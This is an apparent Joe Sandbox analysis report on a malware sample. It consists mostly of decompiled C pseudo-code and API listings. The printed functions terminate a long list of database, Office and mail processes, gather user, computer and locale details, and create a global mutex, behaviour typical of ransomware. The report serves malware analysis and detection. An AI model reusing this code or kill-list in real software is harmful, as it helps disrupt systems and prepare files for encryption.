                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
                                    • String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
                                    • API String ID: 139215849-2398311915
                                    • Opcode ID: e9623cf4644d256d14c7d69c3759b4073a8067a4a73cdf18faeb4b36fda37c82
                                    • Instruction ID: 771572041b1eb57703340caded6851e0109114bff87869e903ba5e3081b329f2
                                    • Opcode Fuzzy Hash: e9623cf4644d256d14c7d69c3759b4073a8067a4a73cdf18faeb4b36fda37c82
                                    • Instruction Fuzzy Hash: 5E419F71204311ABE304EF20DD49BAB7FD9BB88715F044439B545B6282DBBC990BCBA6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 430 f5848c0-f584a56 CreateToolhelp32Snapshot VirtualAlloc 431 f584a58-f584a61 430->431 432 f584a6b-f584a71 430->432 431->432 434 f584a63-f584a65 Process32FirstW 431->434 433 f584a74-f584a76 432->433 435 f584a80-f584a8d 433->435 434->432 437 f584abb-f584ac2 435->437 438 f584a8f-f584a9f OpenProcess 435->438 437->435 441 f584ac4-f584ad5 Process32NextW 437->441 439 f584aa1-f584ab3 TerminateProcess CloseHandle 438->439 440 f584ab5 438->440 439->437 440->437 441->433 442 f584ad7-f584ad9 441->442 443 f584ae9-f584af2 FindCloseChangeNotification 442->443 444 f584adb-f584ae3 VirtualFree 442->444 444->443
                                    C-Code - Quality: 98%
                                    			E0F5848C0() {
                                    				char* _v12;
                                    				char* _v16;
                                    				char* _v20;
                                    				char* _v24;
                                    				char* _v28;
                                    				char* _v32;
                                    				char* _v36;
                                    				char* _v40;
                                    				char* _v44;
                                    				char* _v48;
                                    				char* _v52;
                                    				char* _v56;
                                    				char* _v60;
                                    				char* _v64;
                                    				char* _v68;
                                    				char* _v72;
                                    				char* _v76;
                                    				char* _v80;
                                    				char* _v84;
                                    				char* _v88;
                                    				char* _v92;
                                    				char* _v96;
                                    				char* _v100;
                                    				char* _v104;
                                    				char* _v108;
                                    				char* _v112;
                                    				char* _v116;
                                    				char* _v120;
                                    				char* _v124;
                                    				char* _v128;
                                    				char* _v132;
                                    				char* _v136;
                                    				char* _v140;
                                    				char* _v144;
                                    				char* _v148;
                                    				char* _v152;
                                    				char* _v156;
                                    				char* _v160;
                                    				char* _v164;
                                    				void* _v172;
                                    				void* _t49;
                                    				void* _t50;
                                    				int _t51;
                                    				int _t52;
                                    				int _t53;
                                    				void* _t60;
                                    				WCHAR* _t62;
                                    				void* _t65;
                                    				void* _t70;
                                    				signed int _t71;
                                    				void* _t72;
                                    				signed int _t74;
                                    				void* _t76;
                                    
                                    				_t76 = (_t74 & 0xfffffff8) - 0xa4;
                                    				_v164 = L"msftesql.exe";
                                    				_v160 = L"sqlagent.exe";
                                    				_v156 = L"sqlbrowser.exe";
                                    				_v152 = L"sqlservr.exe";
                                    				_v148 = L"sqlwriter.exe";
                                    				_v144 = L"oracle.exe";
                                    				_v140 = L"ocssd.exe";
                                    				_v136 = L"dbsnmp.exe";
                                    				_v132 = L"synctime.exe";
                                    				_v128 = L"mydesktopqos.exe";
                                    				_v124 = L"agntsvc.exeisqlplussvc.exe";
                                    				_v120 = L"xfssvccon.exe";
                                    				_v116 = L"mydesktopservice.exe";
                                    				_v112 = L"ocautoupds.exe";
                                    				_v108 = L"agntsvc.exeagntsvc.exe";
                                    				_v104 = L"agntsvc.exeencsvc.exe";
                                    				_v100 = L"firefoxconfig.exe";
                                    				_v96 = L"tbirdconfig.exe";
                                    				_v92 = L"ocomm.exe";
                                    				_v88 = L"mysqld.exe";
                                    				_v84 = L"mysqld-nt.exe";
                                    				_v80 = L"mysqld-opt.exe";
                                    				_v76 = L"dbeng50.exe";
                                    				_v72 = L"sqbcoreservice.exe";
                                    				_v68 = L"excel.exe";
                                    				_v64 = L"infopath.exe";
                                    				_v60 = L"msaccess.exe";
                                    				_v56 = L"mspub.exe";
                                    				_v52 = L"onenote.exe";
                                    				_v48 = L"outlook.exe";
                                    				_v44 = L"powerpnt.exe";
                                    				_v40 = L"steam.exe";
                                    				_v36 = L"sqlservr.exe";
                                    				_v32 = L"thebat.exe";
                                    				_v28 = L"thebat64.exe";
                                    				_v24 = L"thunderbird.exe";
                                    				_v20 = L"visio.exe";
                                    				_v16 = L"winword.exe";
                                    				_v12 = L"wordpad.exe";
                                    				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
                                    				_t70 = _t49;
                                    				_v172 = _t70;
                                    				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
                                    				_t60 = _t50;
                                    				if(_t60 != 0) {
                                    					 *_t60 = 0x22c;
                                    					if(_t70 != 0xffffffff) {
                                    						_push(_t60);
                                    						Process32FirstW(_t70); // executed
                                    					}
                                    				}
                                    				_t41 = _t60 + 0x24; // 0x24
                                    				_t62 = _t41;
                                    				do {
                                    					_t71 = 0;
                                    					do {
                                    						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
                                    						if(_t51 == 0) {
                                    							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
                                    							if(_t65 != 0) {
                                    								TerminateProcess(_t65, 0);
                                    								CloseHandle(_t65);
                                    							}
                                    						}
                                    						_t71 = _t71 + 1;
                                    						_t46 = _t60 + 0x24; // 0x24
                                    						_t62 = _t46;
                                    					} while (_t71 < 0x27);
                                    					_t72 = _v172;
                                    					_t52 = Process32NextW(_t72, _t60);
                                    					_t48 = _t60 + 0x24; // 0x24
                                    					_t62 = _t48;
                                    				} while (_t52 != 0);
                                    				if(_t60 != 0) {
                                    					VirtualFree(_t60, 0, 0x8000); // executed
                                    				}
                                    				_t53 = FindCloseChangeNotification(_t72); // executed
                                    				return _t53;
                                    			}
























































                                    0x0f5848c6
                                    0x0f5848d3
                                    0x0f5848db
                                    0x0f5848e3
                                    0x0f5848eb
                                    0x0f5848f3
                                    0x0f5848fb
                                    0x0f584903
                                    0x0f58490b
                                    0x0f584913
                                    0x0f58491b
                                    0x0f584923
                                    0x0f58492b
                                    0x0f584933
                                    0x0f58493b
                                    0x0f584943
                                    0x0f58494b
                                    0x0f584953
                                    0x0f58495b
                                    0x0f584963
                                    0x0f58496b
                                    0x0f584973
                                    0x0f58497b
                                    0x0f584983
                                    0x0f58498b
                                    0x0f584993
                                    0x0f58499b
                                    0x0f5849a3
                                    0x0f5849ae
                                    0x0f5849b9
                                    0x0f5849c4
                                    0x0f5849cf
                                    0x0f5849da
                                    0x0f5849e5
                                    0x0f5849f0
                                    0x0f5849fb
                                    0x0f584a06
                                    0x0f584a11
                                    0x0f584a1c
                                    0x0f584a27
                                    0x0f584a32
                                    0x0f584a44
                                    0x0f584a48
                                    0x0f584a4c
                                    0x0f584a52
                                    0x0f584a56
                                    0x0f584a58
                                    0x0f584a61
                                    0x0f584a63
                                    0x0f584a65
                                    0x0f584a65
                                    0x0f584a61
                                    0x0f584a71
                                    0x0f584a71
                                    0x0f584a74
                                    0x0f584a74
                                    0x0f584a80
                                    0x0f584a85
                                    0x0f584a8d
                                    0x0f584a9b
                                    0x0f584a9f
                                    0x0f584aa4
                                    0x0f584ab1
                                    0x0f584ab1
                                    0x0f584a9f
                                    0x0f584abb
                                    0x0f584abc
                                    0x0f584abc
                                    0x0f584abf
                                    0x0f584ac4
                                    0x0f584aca
                                    0x0f584ad0
                                    0x0f584ad0
                                    0x0f584ad3
                                    0x0f584ad9
                                    0x0f584ae3
                                    0x0f584ae3
                                    0x0f584aea
                                    0x0f584af2

                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0F584A32
                                    • VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0F584A4C
                                    • Process32FirstW.KERNEL32(00000000,00000000), ref: 0F584A65
                                    • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F584A85
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F584A95
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0F584AA4
                                    • CloseHandle.KERNEL32(00000000), ref: 0F584AB1
                                    • Process32NextW.KERNEL32(?,00000000), ref: 0F584ACA
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F584AE3
                                    • FindCloseChangeNotification.KERNEL32(?), ref: 0F584AEA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
                                    • String ID: i)w
                                    • API String ID: 3023235786-1280834553
                                    • Opcode ID: d1d312dff32233aaec35ca917e60c72902ef578caecebe7eb2328325f465553f
                                    • Instruction ID: a5e6a378b55c7ef619c32334364e3d2b63d1585fd9da39f2db305f325d105f33
                                    • Opcode Fuzzy Hash: d1d312dff32233aaec35ca917e60c72902ef578caecebe7eb2328325f465553f
                                    • Instruction Fuzzy Hash: D5515EB51083419FE320EF51954875BBFE4FBA9718F60492DE594BB252C734880BCF96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0F583BC0: GetProcessHeap.KERNEL32(?,?,0F584807,00000000,?,00000000,00000000), ref: 0F583C5C
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F5874B7
                                      • Part of subcall function 0F587490: GetUserNameW.ADVAPI32 ref: 0F5874C8
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F5874E6
                                      • Part of subcall function 0F587490: GetComputerNameW.KERNEL32 ref: 0F5874F0
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F587510
                                      • Part of subcall function 0F587490: wsprintfW.USER32 ref: 0F587551
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F58756E
                                      • Part of subcall function 0F587490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F587592
                                      • Part of subcall function 0F587490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F584810,?), ref: 0F5875B6
                                      • Part of subcall function 0F587490: RegCloseKey.KERNEL32(00000000), ref: 0F5875D2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872F2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872FD
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587313
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58731E
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587334
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58733F
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587355
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(0F584B36,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587360
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587376
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587381
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587397
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873A2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873C1
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873CC
                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58482C
                                    • lstrcpyW.KERNEL32 ref: 0F58484F
                                    • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584856
                                    • CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58486E
                                    • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58487A
                                    • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584881
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58489B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
                                    • String ID: Global\
                                    • API String ID: 3131499543-188423391
                                    • Opcode ID: 4f5bb87c5ed08e318a808f738d565ff6078c7f6d9d89c352492d9a1fee210d07
                                    • Instruction ID: cdf7a54993bd3f3f5c11b4a493e5204001f3a608bd5b5e4e568676fe4fbc45d2
                                    • Opcode Fuzzy Hash: 4f5bb87c5ed08e318a808f738d565ff6078c7f6d9d89c352492d9a1fee210d07
                                    • Instruction Fuzzy Hash: 23212371650712BBE124B724DC4AF7F7B5CEB80B11F600239BA05B61D1AA98790B8AE5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F584A78(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
                                    				int _t8;
                                    				int _t9;
                                    				int _t10;
                                    				void* _t15;
                                    				WCHAR* _t17;
                                    				void* _t18;
                                    				signed int _t23;
                                    				void* _t24;
                                    				void* _t28;
                                    
                                    				_t17 = __ecx;
                                    				_t15 = __ebx;
                                    				while(1) {
                                    					L2:
                                    					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                    					if(_t8 == 0) {
                                    						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                    						if(_t18 != 0) {
                                    							TerminateProcess(_t18, 0);
                                    							CloseHandle(_t18);
                                    						}
                                    					}
                                    					_t23 = _t23 + 1;
                                    					_t5 = _t15 + 0x24; // 0x24
                                    					_t17 = _t5;
                                    					if(_t23 < 0x27) {
                                    						continue;
                                    					}
                                    					L7:
                                    					_t24 = _a12;
                                    					_t9 = Process32NextW(_t24, _t15);
                                    					_t7 = _t15 + 0x24; // 0x24
                                    					_t17 = _t7;
                                    					if(_t9 != 0) {
                                    						_t23 = 0;
                                    						do {
                                    							goto L2;
                                    						} while (_t23 < 0x27);
                                    						goto L7;
                                    					}
                                    					if(_t15 != 0) {
                                    						VirtualFree(_t15, 0, 0x8000); // executed
                                    					}
                                    					_t10 = FindCloseChangeNotification(_t24); // executed
                                    					return _t10;
                                    					L2:
                                    					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                    					if(_t8 == 0) {
                                    						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                    						if(_t18 != 0) {
                                    							TerminateProcess(_t18, 0);
                                    							CloseHandle(_t18);
                                    						}
                                    					}
                                    					_t23 = _t23 + 1;
                                    					_t5 = _t15 + 0x24; // 0x24
                                    					_t17 = _t5;
                                    				}
                                    			}












                                    0x0f584a78
                                    0x0f584a78
                                    0x0f584a80
                                    0x0f584a80
                                    0x0f584a85
                                    0x0f584a8d
                                    0x0f584a9b
                                    0x0f584a9f
                                    0x0f584aa4
                                    0x0f584ab1
                                    0x0f584ab1
                                    0x0f584a9f
                                    0x0f584abb
                                    0x0f584abc
                                    0x0f584abc
                                    0x0f584ac2
                                    0x00000000
                                    0x00000000
                                    0x0f584ac4
                                    0x0f584ac4
                                    0x0f584aca
                                    0x0f584ad0
                                    0x0f584ad0
                                    0x0f584ad5
                                    0x0f584a74
                                    0x0f584a80
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f584a80
                                    0x0f584ad9
                                    0x0f584ae3
                                    0x0f584ae3
                                    0x0f584aea
                                    0x0f584af2
                                    0x0f584a80
                                    0x0f584a85
                                    0x0f584a8d
                                    0x0f584a9b
                                    0x0f584a9f
                                    0x0f584aa4
                                    0x0f584ab1
                                    0x0f584ab1
                                    0x0f584a9f
                                    0x0f584abb
                                    0x0f584abc
                                    0x0f584abc
                                    0x0f584abf

                                    APIs
                                    • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F584A85
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F584A95
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0F584AA4
                                    • CloseHandle.KERNEL32(00000000), ref: 0F584AB1
                                    • Process32NextW.KERNEL32(?,00000000), ref: 0F584ACA
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F584AE3
                                    • FindCloseChangeNotification.KERNEL32(?), ref: 0F584AEA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
                                    • String ID: i)w
                                    • API String ID: 3573210778-1280834553
                                    • Opcode ID: be91fde881da1e021e417219323cf6ef2830974b8f40194d052ea10f061a5b6e
                                    • Instruction ID: afc5d68616beee0a847f8aa24f2523bddbe59793893879677c402e05be8aec33
                                    • Opcode Fuzzy Hash: be91fde881da1e021e417219323cf6ef2830974b8f40194d052ea10f061a5b6e
                                    • Instruction Fuzzy Hash: 7301FE32100102FFD710AF50AD85B5A77AEFF84712F314035FE09BA141D734981B9B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F5835C0(intOrPtr __ecx, intOrPtr __edx) {
                                    				long _v8;
                                    				long _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				long _v24;
                                    				void* _t12;
                                    				void* _t14;
                                    				long _t17;
                                    				void* _t18;
                                    				int _t21;
                                    				void* _t25;
                                    				char* _t29;
                                    				void* _t37;
                                    				void* _t39;
                                    
                                    				_v16 = __edx;
                                    				_v20 = __ecx;
                                    				_v12 = 0;
                                    				_t12 = VirtualAlloc(0, 0xa00, 0x3000, 4); // executed
                                    				_t39 = _t12;
                                    				if(_t39 != 0) {
                                    					GetModuleFileNameW(0, _t39, 0x100);
                                    					_t14 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0, 0); // executed
                                    					_t37 = _t14;
                                    					if(_t37 != 0xffffffff) {
                                    						_t17 = GetFileSize(_t37, 0);
                                    						_v8 = _t17;
                                    						_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
                                    						_t25 = _t18;
                                    						if(_t25 != 0) {
                                    							_t21 = ReadFile(_t37, _t25, _v8,  &_v24, 0); // executed
                                    							if(_t21 != 0) {
                                    								_t29 = _v8 - 1 + _t25;
                                    								if( *_t29 != 0) {
                                    									do {
                                    										_t29 = _t29 - 1;
                                    									} while ( *_t29 != 0);
                                    									E0F5834F0(_t29 + 1, _v20, _v16);
                                    									_t32 =  !=  ? 1 : 0;
                                    									_v12 =  !=  ? 1 : 0;
                                    								}
                                    							}
                                    							VirtualFree(_t25, 0, 0x8000); // executed
                                    						}
                                    						CloseHandle(_t37);
                                    					}
                                    					VirtualFree(_t39, 0, 0x8000); // executed
                                    					return _v12;
                                    				} else {
                                    					return _t12;
                                    				}
                                    			}

















                                    0x0f5835dc
                                    0x0f5835df
                                    0x0f5835e2
                                    0x0f5835e9
                                    0x0f5835eb
                                    0x0f5835ef
                                    0x0f583600
                                    0x0f583616
                                    0x0f58361c
                                    0x0f583621
                                    0x0f583626
                                    0x0f583636
                                    0x0f583639
                                    0x0f58363b
                                    0x0f58363f
                                    0x0f58364c
                                    0x0f583654
                                    0x0f58365a
                                    0x0f58365f
                                    0x0f583661
                                    0x0f583661
                                    0x0f583662
                                    0x0f58366e
                                    0x0f58367f
                                    0x0f583682
                                    0x0f583682
                                    0x0f58365f
                                    0x0f58368d
                                    0x0f58368d
                                    0x0f583694
                                    0x0f583694
                                    0x0f5836a2
                                    0x0f5836b1
                                    0x0f5835f6
                                    0x0f5835f6
                                    0x0f5835f6

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000A00,00003000,00000004,?,77296980), ref: 0F5835E9
                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100,772D82B0), ref: 0F583600
                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0F583616
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0F583626
                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F583639
                                    • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0F58364C
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F58368D
                                    • CloseHandle.KERNEL32(00000000), ref: 0F583694
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5836A2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileVirtual$AllocFree$CloseCreateHandleModuleNameReadSize
                                    • String ID:
                                    • API String ID: 2352497600-0
                                    • Opcode ID: e211a75ede2c2e1665cc1d3d9220e76e2eb715594cf79eda6072332d57854673
                                    • Instruction ID: e599193e7c4041a2befb8ab07b480e90e0128ce1b3f4c355849a55e32297ea98
                                    • Opcode Fuzzy Hash: e211a75ede2c2e1665cc1d3d9220e76e2eb715594cf79eda6072332d57854673
                                    • Instruction Fuzzy Hash: 1121F931B403047BFB216BA99D86FAE7B68EB44B21F200069FB05BA3C1D7B895179754
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F587D70(intOrPtr* __ecx) {
                                    				int _t20;
                                    				intOrPtr* _t24;
                                    
                                    				_t24 = __ecx;
                                    				if( *__ecx != 0) {
                                    					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
                                    					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
                                    				}
                                    				return _t20;
                                    			}





                                    0x0f587d71
                                    0x0f587d7d
                                    0x0f587d89
                                    0x0f587d89
                                    0x0f587d8f
                                    0x0f587d9b
                                    0x0f587d9b
                                    0x0f587da1
                                    0x0f587dad
                                    0x0f587dad
                                    0x0f587db3
                                    0x0f587dbf
                                    0x0f587dbf
                                    0x0f587dc5
                                    0x0f587dd1
                                    0x0f587dd1
                                    0x0f587dd7
                                    0x0f587de3
                                    0x0f587de3
                                    0x0f587de9
                                    0x0f587df5
                                    0x0f587df5
                                    0x0f587dfb
                                    0x0f587e07
                                    0x0f587e07
                                    0x0f587e0d
                                    0x0f587e19
                                    0x0f587e19
                                    0x0f587e22
                                    0x00000000
                                    0x0f587e31
                                    0x0f587e35

                                    APIs
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587D89
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587D9B
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DAD
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DBF
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DD1
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DE3
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DF5
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587E07
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587E19
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587E31
                                    Memory Dump Source
